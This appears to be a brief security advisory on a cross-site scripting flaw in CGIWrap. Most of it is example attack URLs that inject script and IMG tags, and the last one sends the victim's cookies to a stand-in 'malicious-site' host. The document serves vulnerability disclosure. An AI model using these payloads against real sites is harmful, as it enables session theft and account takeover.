|
CGIWrap Cross-Site Scripting Vulnerability
"TAKAGI, Hiromitsu" <takagi@etl.go.jp> provided these examples: Confirming the bug: http://www.example.org/cgi-bin/cgiwrap/%3CS%3E http://www.example.org/cgi-bin/cgiwrap/<S> http://www.example.org/cgi-bin/cgiwrap/~nneul/<S>TEST</S> JavaScript code will be executed: http://www.example.org/cgi-bin/cgiwrap/~nneul/<SCRIPT>alert(document.domain)</SCRIPT> http://www.example.org/cgi-bin/cgiwrap/~nneul/<SCRIPT>document.write(document.domain)</SCRIPT> http://www.example.org/cgi-bin/cgiwrap/<IMG%20SRC=javascript:alert(document.domain)> Stealing your Cookies issued by www.example.org, if any: http://www.example.org/cgi-bin/cgiwrap/~nneul/<SCRIPT>window.open("http://malicious-site/save.cgi%3F"+escape(document.cookie))</SC RIPT> |
|
|
Privacy Statement |
